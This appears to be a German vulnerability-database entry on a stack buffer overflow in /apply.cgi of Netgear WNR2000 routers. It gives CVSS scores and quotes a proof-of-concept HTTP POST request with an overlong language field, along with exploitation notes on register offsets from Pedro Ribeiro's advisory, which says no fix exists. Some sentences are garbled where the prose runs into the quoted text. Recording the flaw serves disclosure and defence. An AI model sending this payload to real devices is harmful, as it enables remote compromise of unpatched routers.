Es wurde eine Schwachstelle in Netgear WNR2000v3, WNR2000v4 sowie WNR2000v5 - die betroffene Version ist nicht klar definiert - entdeckt. Sie wurde als kritisch eingestuft. Es betrifft eine unbekannte Funktion der Datei /apply.cgi der Komponente uhttpd. Mit der Manipulation mit einer unbekannten Eingabe kann eine Pufferüberlauf-Schwachstelle (Stack-based) ausgenutzt werden. Die Auswirkungen sind bekannt für Vertraulichkeit, Integrität und Verfügbarkeit.
Die Schwachstelle wurde am 20.12.2016 durch Pedro Ribeiro als [0-day] RCE and admin credential disclosure in NETGEAR WNR2000 in Form eines ungeprüften Mailinglist Posts (Full-Disclosure) publiziert. Das Advisory kann von zur Verfügung gestellt. Vor einer Veröffentlichung handelte es sich 85 Tage um eine Zero-Day Schwachstelle. Während dieser Zeit erzielte er wohl etwa $0-$5k auf dem Schwarzmarkt. Der durch den Exploit genutzte Code gestaltet sich wie folgt:
POST /apply.cgi?/lang_check.html%20timestamp=14948715 HTTP/1.1Das Advisory zeigt auf:
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
Content-Type: application/x-www-form-urlencoded
Content-Length: 604
submit_flag=select_language&hidden_lang_avi=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAAABBBBCCCCDDDDEEEEFFFFbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
As it can be seen above, a stack variable which is located at an offset of 0x38 is the one overflown and it is in this function that the crash shown in gdb above occurs. The first register we control, $s0, has its value stored at offset 0x14, which is stored in the stack 0x24 (36) bytes from the stack variable that gets overwritten. Das Advisory stellt fest:
NETGEAR did not respond to any emails, so THERE IS NO FIX for this vulnerability. It is recommended to replace this router with another make and model that supports OpenWRT firmware.Von weiterem Interesse können die folgenden Einträge sein: .
CVSSv3
Base Score: 7.3Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:U/RC:R
Temp Score: 6.4 (CVSS2#E:POC/RL:U/RC:UR)
Exploiting
Klasse: PufferüberlaufLokal: Nein
Remote: Ja
Verfügbarkeit: Ja
Zugang: öffentlich
Status: Proof-of-Concept
Programmiersprache: HTTP POST Request
Autor: Pedro Ribeiro
Download:
20.12.2016
22.12.2016
Person: Pedro Ribeiro
Status: Ungeprüft
Siehe auch:
Eintrag
Erstellt: 22.12.2016Eintrag: 76.4% komplett
SOCIAL SHARE CARD GENERATOR